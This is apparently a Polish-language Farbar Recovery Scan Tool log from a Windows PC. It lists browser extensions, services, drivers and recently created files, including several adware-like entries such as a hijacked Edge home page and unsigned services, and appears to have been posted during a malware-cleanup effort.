Edge HomeButtonPage: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT

FireFox:
========
FF DefaultProfile: zao9ohxy.default
FF ProfilePath: C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default [2017-04-22]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\zao9ohxy.default -> Google
FF Homepage: Mozilla\Firefox\Profiles\zao9ohxy.default -> about:home
FF Extension: (Amazon Assistant for Firefox) - C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\Extensions\abb-acer@amazon.com [2016-11-25]
FF Extension: (Polski Language Pack) - C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-04-20]
FF Extension: (Mozilla Partner Defaults) - C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\Extensions\partnerdefaults@mozilla.com [2016-11-25]
FF Extension: (Greasemonkey) - C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2017-02-22]
FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2017-02-14]
FF ProfilePath: C:\Users\Emil\AppData\Roaming\Firefox\Firefox\Profiles\zao9ohxy.default [2017-04-19]
FF Extension: (Amazon Assistant for Firefox) - C:\Users\Emil\AppData\Roaming\Firefox\Firefox\Profiles\zao9ohxy.default\Extensions\abb-acer@amazon.com [2017-04-17]
FF Extension: (Polski Language Pack) - C:\Users\Emil\AppData\Roaming\Firefox\Firefox\Profiles\zao9ohxy.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-04-17] [Brak podpisu cyfrowego]
FF Extension: (Greasemonkey) - C:\Users\Emil\AppData\Roaming\Firefox\Firefox\Profiles\zao9ohxy.default\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2017-02-22]
FF Extension: (Disable Prefetch) - C:\Users\Emil\AppData\Roaming\Firefox\Firefox\Profiles\zao9ohxy.default\features\{ddf68c7d-0ad0-42a3-ac01-a234b93a8b50}\disable-prefetch@mozilla.org.xpi [2017-04-04]
FF SearchPlugin: C:\Users\Emil\AppData\Roaming\Firefox\Firefox\Profiles\zao9ohxy.default\searchplugins\startsearch.xml [2017-04-17]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2017-03-14] [Brak podpisu cyfrowego]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2017-04-06] ()
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2017-03-03] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2017-04-06] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2017-03-03] ()
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-03-06] (Microsoft Corporation)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\2\NP_wtapp.dll [2017-04-08] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2012-01-03] (Adobe Systems Inc.)

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx

==================== Usługi (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

R2 3DM; C:\Users\Emil\AppData\Local\3DM\Kitty.dll [754688 2017-04-18] (kitty.exe) [Brak podpisu cyfrowego]
R2 Amazon Assistant Service; C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe [102064 2017-02-28] ()
R2 AtherosSvc; C:\WINDOWS\system32\AdminService.exe [355760 2016-06-26] (Windows (R) Win 7 DDK provider)
R2 CCDMonitorService; C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe [2267352 2016-08-30] (Acer Incorporated)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3735744 2017-03-02] (Microsoft Corporation)
S3 ClientAnalyticsService; C:\Program Files\Common Files\McAfee\ClientAnalytics\Legacy\McClientAnalytics.exe [1701840 2016-12-08] (Intel Security)
R2 Dashlane Upgrade Service; C:\Program Files (x86)\Dashlane\Upgrade\DashlaneUpgradeService.exe [82968 2016-04-08] (Dashlane SAS)
R2 FLAME II HSPA USB MODEM Service; C:\Program Files (x86)\My Connection\ApplicationController.exe [574464 2015-09-24] () [Brak podpisu cyfrowego]
S2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [350576 2017-04-08] (WildTangent)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [382456 2017-02-01] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel(R) Corporation)
S3 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [Brak podpisu cyfrowego]
R2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-05-19] () [Brak podpisu cyfrowego]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [223008 2015-06-24] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [188264 2017-04-18] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_15_6\McApExe.exe [989632 2017-01-23] (McAfee, Inc.)
S3 McAWFwk; C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [353128 2015-11-27] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.523\McCHSvc.exe [404376 2017-03-20] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\2.3.253.0\\McCSPServiceHost.exe [2053568 2016-11-16] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [1342904 2017-02-01] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [241040 2016-11-14] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [383032 2016-11-14] (McAfee, Inc.)
R3 mfevtp; C:\Windows\system32\mfevtps.exe [342768 2016-11-14] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1465840 2016-12-22] (McAfee, Inc.)
S3 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-12-29] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3634232 2016-06-15] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2522680 2016-06-15] (NVIDIA Corporation)
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1104304 2016-11-15] (Intel Security, Inc.)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2016-12-07] ()
R2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2016-12-07] ()
R3 QALSvc; C:\Program Files\Acer\Acer Quick Access\QALSvc.exe [440224 2016-03-11] (Acer Incorporated)
R3 QASvc; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [481696 2016-03-11] (Acer Incorporated)
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
R2 TrueKey; C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe [990656 2016-10-28] (McAfee, Inc.)
R2 TrueKeyScheduler; C:\Program Files\TrueKey\McTkSchedulerService.exe [16248 2016-10-28] (McAfee, Inc.)
S3 TrueKeyServiceHelper; C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [86864 2016-10-28] (McAfee, Inc.)
R3 UEIPSvc; C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe [291232 2016-02-01] (acer)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2017-03-28] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2017-03-28] (Microsoft Corporation)
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]

===================== Sterowniki (filtrowane) ======================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [88456 2016-11-18] (McAfee, Inc.)
S1 cfywlan2; C:\WINDOWS\system32\DRIVERS\cfywlan2.sys [46088 2017-02-05] (Connectify)
S1 cnnctfy4; C:\WINDOWS\system32\DRIVERS\cnnctfy4.sys [53216 2017-02-05] (Connectify)
S3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2016-11-25] (Disc Soft Ltd)
S3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-11-25] (Disc Soft Ltd)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77440 2017-04-20] ()
S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [216704 2016-08-02] (McAfee, Inc.)
R3 LMDriver; C:\WINDOWS\System32\drivers\LMDriver.sys [21408 2016-03-11] (Acer Incorporated)
R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [186304 2017-04-20] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [111544 2017-04-22] (Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-04-22] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [251832 2017-04-22] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [92096 2017-04-22] (Malwarebytes)
R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [484576 2016-11-18] (McAfee, Inc.)
R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [366320 2016-11-18] (McAfee, Inc.)
S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [85048 2016-11-18] (McAfee, Inc.)
R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [518184 2016-11-18] (McAfee, Inc.)
R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [916432 2016-11-18] (McAfee, Inc.)
R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [498152 2016-10-24] (McAfee, Inc.)
S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [109336 2016-10-24] (McAfee, Inc.)
R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [110248 2016-11-18] (McAfee, Inc.)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [46240 2016-06-06] (McAfee, Inc.)
R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [254800 2016-11-18] (McAfee, Inc.)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvacwu.inf_amd64_bdd6ea477d4e2fba\nvlddmkm.sys [14190520 2017-01-17] (NVIDIA Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [28216 2016-06-15] (NVIDIA Corporation)
S3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [56384 2016-04-14] (NVIDIA Corporation)
R3 Qcamain10x64; C:\WINDOWS\System32\drivers\Qcamain10x64.sys [2336768 2016-07-16] (Qualcomm Atheros, Inc.)
R3 RadioShim; C:\WINDOWS\System32\drivers\RadioShim.sys [14752 2016-03-11] (Acer Incorporated)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [886528 2015-05-29] (Realtek                                            )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [410880 2015-07-03] (Realsil Semiconductor Corporation)
R0 sptd2; C:\WINDOWS\System32\Drivers\sptd2.sys [203296 2017-04-19] (Duplex Secure Ltd)
R3 SynRMIHID; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [47784 2015-07-29] (Synaptics Incorporated)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)

==================== NetSvcs (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)


==================== Jeden miesiąc - utworzone pliki i foldery ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2017-04-22 13:12 - 2017-04-22 13:12 - 00000523 _____ C:\Users\Emil\Downloads\SearchReg.txt
2017-04-22 13:12 - 2017-04-22 13:12 - 00000523 _____ C:\Users\Emil\Desktop\SearchReg.txt
2017-04-22 13:03 - 2017-04-22 13:08 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-04-22 12:56 - 2017-04-22 12:56 - 00009064 _____ C:\Users\Emil\Desktop\AdwCleaner[C0].txt
2017-04-22 12:56 - 2017-04-22 12:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2017-04-22 12:11 - 2017-04-22 12:11 - 00000000 ____D C:\Users\Emil\AppData\Local\Google
2017-04-22 12:11 - 2017-04-22 12:11 - 00000000 ____D C:\Users\Emil\AppData\Local\Boxbob
2017-04-22 00:37 - 2017-04-22 00:37 - 00000000 ____D C:\Program Files (x86)\MK
2017-04-22 00:37 - 2017-04-22 00:37 - 00000000 ____D C:\Program Files (x86)\AlphaGo
2017-04-21 15:03 - 2017-04-21 15:03 - 00000000 ____D C:\Program Files (x86)\Boxbob
2017-04-21 14:57 - 2017-04-21 14:57 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-04-20 21:36 - 2017-04-20 21:36 - 00000000 ____D C:\Users\Emil\AppData\Local\NetworkTiles
2017-04-20 21:35 - 2017-04-22 12:46 - 00000000 ____D C:\AdwCleaner
2017-04-20 21:34 - 2017-04-20 21:35 - 04089296 _____ C:\Users\Emil\Downloads\AdwCleaner.exe
2017-04-20 21:33 - 2017-04-22 12:57 - 00000000 ____D C:\Users\Emil\Downloads\FRST-OlderVersion
2017-04-20 21:33 - 2017-04-22 12:03 - 00008214 _____ C:\Users\Emil\Downloads\Fixlog.txt
2017-04-20 21:33 - 2017-04-20 21:33 - 00006706 _____ C:\Users\Emil\Downloads\fixlist.txt
2017-04-20 18:40 - 2017-04-20 18:40 - 00000000 ____D C:\Users\Emil\AppData\Local\Publishers
2017-04-20 12:52 - 2017-04-22 12:51 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-19 20:02 - 2017-04-19 20:02 - 00199301 _____ C:\Users\Emil\Desktop\lllooog.txt
2017-04-19 19:57 - 2017-04-19 19:57 - 00102657 _____ C:\Users\Emil\Desktop\FRST.txt
2017-04-19 19:57 - 2017-04-19 19:57 - 00049511 _____ C:\Users\Emil\Desktop\Shortcut.txt
2017-04-19 19:57 - 2017-04-19 19:57 - 00047531 _____ C:\Users\Emil\Desktop\Addition.txt
2017-04-19 19:49 - 2017-04-19 19:49 - 00049508 _____ C:\Users\Emil\Downloads\Shortcut.txt
2017-04-19 19:45 - 2017-04-19 19:49 - 00047528 _____ C:\Users\Emil\Downloads\Addition.txt
2017-04-19 19:42 - 2017-04-22 13:14 - 00027025 _____ C:\Users\Emil\Downloads\FRST.txt
2017-04-19 19:41 - 2017-04-22 13:12 - 00000000 ____D C:\FRST
2017-04-19 19:40 - 2017-04-22 12:57 - 02425344 _____ (Farbar) C:\Users\Emil\Downloads\FRST64.exe
2017-04-19 19:34 - 2017-04-19 19:37 - 00380928 _____ C:\Users\Emil\Downloads\5ymv7ohx.exe
2017-04-19 19:03 - 2017-04-19 19:03 - 00203296 _____ (Duplex Secure Ltd) C:\WINDOWS\system32\Drivers\sptd2.sys
2017-04-19 19:02 - 2017-04-19 19:03 - 00360696 _____ (Duplex Secure Ltd) C:\Users\Emil\Downloads\SPTD2inst-v212-x64.exe
2017-04-19 18:44 - 2017-04-22 12:54 - 00000000 ____D C:\Users\Emil\AppData\LocalLow\Mozilla
2017-04-19 18:43 - 2017-04-19 18:43 - 00000000 ____D C:\Users\Emil\PicStream
2017-04-19 18:39 - 2017-04-22 12:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-04-19 18:34 - 2017-04-20 20:20 - 00186304 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-04-19 18:33 - 2017-04-22 12:53 - 00111544 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-04-19 18:33 - 2017-04-22 12:53 - 00092096 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-04-19 18:33 - 2017-04-22 12:53 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-04-19 18:33 - 2017-04-22 12:52 - 00251832 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-04-19 18:33 - 2017-04-20 20:20 - 00077440 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-04-19 18:33 - 2017-04-19 18:33 - 00001916 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-04-19 18:33 - 2017-04-19 18:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-04-19 18:33 - 2017-04-19 18:33 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-04-19 18:33 - 2017-04-19 18:33 - 00000000 ____D C:\Program Files\Malwarebytes
2017-04-19 18:29 - 2017-04-19 18:32 - 55566792 _____ (Malwarebytes ) C:\Users\Emil\Downloads\mb3-setup-consumer-3.0.6.1469.exe
2017-04-19 17:40 - 2017-04-19 17:40 - 00000000 ____D C:\Users\Emil\AppData\Local\3DM
2017-04-19 17:37 - 2017-04-21 14:53 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-04-17 15:33 - 2017-04-17 15:33 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Firefox
2017-04-17 15:31 - 2017-04-22 12:46 - 00000000 ____D C:\WINDOWS\system32\log
2017-04-17 15:31 - 2017-04-21 15:03 - 00002219 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-17 15:31 - 2017-04-21 15:03 - 00002149 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-04-17 15:31 - 2017-04-17 15:31 - 00000000 ____D C:\ProgramData\Software
2017-04-17 15:28 - 2017-04-21 14:57 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
2017-04-14 19:36 - 2017-04-14 19:37 - 84719580 _____ C:\Users\Emil\Downloads\1_the_flying_farm.apk
2017-04-13 14:55 - 2017-04-13 14:56 - 00003686 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
2017-04-13 14:54 - 2017-04-13 14:54 - 00000000 ____D C:\Users\Emil\AppData\Roaming\SSMgre
2017-04-13 13:20 - 2017-04-13 13:20 - 00001260 _____ C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ustawienia aktualizacji i prywatności.lnk
2017-04-13 13:20 - 2017-04-13 13:20 - 00000000 ____D C:\Users\Emil\AppData\Local\UNP
2017-04-13 12:51 - 2017-04-13 12:52 - 00000000 ____D C:\Program Files\UNP
2017-04-13 12:51 - 2017-04-13 12:51 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-04-12 11:20 - 2017-03-28 07:41 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-04-12 11:20 - 2017-03-28 07:40 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XblAuthManagerProxy.dll
2017-04-12 11:20 - 2017-03-28 07:38 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XblAuthTokenBrokerExt.dll
2017-04-12 11:20 - 2017-03-28 07:36 - 00769024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ipsecsnp.dll
2017-04-12 11:20 - 2017-03-28 07:35 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2017-04-12 11:20 - 2017-03-28 07:34 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2017-04-12 11:20 - 2017-03-28 07:33 - 00436736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ipsmsnap.dll
2017-04-12 11:20 - 2017-03-28 07:32 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepsync.dll
2017-04-12 11:20 - 2017-03-28 07:32 - 00206336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vaultcli.dll
2017-04-12 11:20 - 2017-03-28 07:32 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepapi.dll
2017-04-12 11:20 - 2017-03-28 07:29 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-04-12 11:20 - 2017-03-28 07:17 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll
2017-04-12 11:20 - 2017-03-28 07:14 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Geolocation.dll
2017-04-12 11:19 - 2017-03-28 09:10 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-04-12 11:19 - 2017-03-28 09:10 - 00315744 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-04-12 11:19 - 2017-03-28 08:21 - 00167848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscapi.dll
2017-04-12 11:19 - 2017-03-28 08:19 - 00601712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-04-12 11:19 - 2017-03-28 08:15 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-04-12 11:19 - 2017-03-28 08:04 - 00861024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-04-12 11:19 - 2017-03-28 08:04 - 00277344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-04-12 11:19 - 2017-03-28 08:04 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-04-12 11:19 - 2017-03-28 08:04 - 00116568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-04-12 11:19 - 2017-03-28 08:02 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2017-04-12 11:19 - 2017-03-28 08:02 - 00576408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-04-12 11:19 - 2017-03-28 07:58 - 01360464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2017-04-12 11:19 - 2017-03-28 07:58 - 00981888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2017-04-12 11:19 - 2017-03-28 07:53 - 01414728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-04-12 11:19 - 2017-03-28 07:53 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-04-12 11:19 - 2017-03-28 07:52 - 00306800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2017-04-12 11:19 - 2017-03-28 07:42 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-04-12 11:19 - 2017-03-28 07:42 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usoapi.dll
2017-04-12 11:19 - 2017-03-28 07:40 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2017-04-12 11:19 - 2017-03-28 07:40 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-04-12 11:19 - 2017-03-28 07:39 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Radios.dll
2017-04-12 11:19 - 2017-03-28 07:39 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll
2017-04-12 11:19 - 2017-03-28 07:38 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\unimdm.tsp
2017-04-12 11:19 - 2017-03-28 07:37 - 00215552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apds.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.HostName.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00097792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.SystemManagement.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
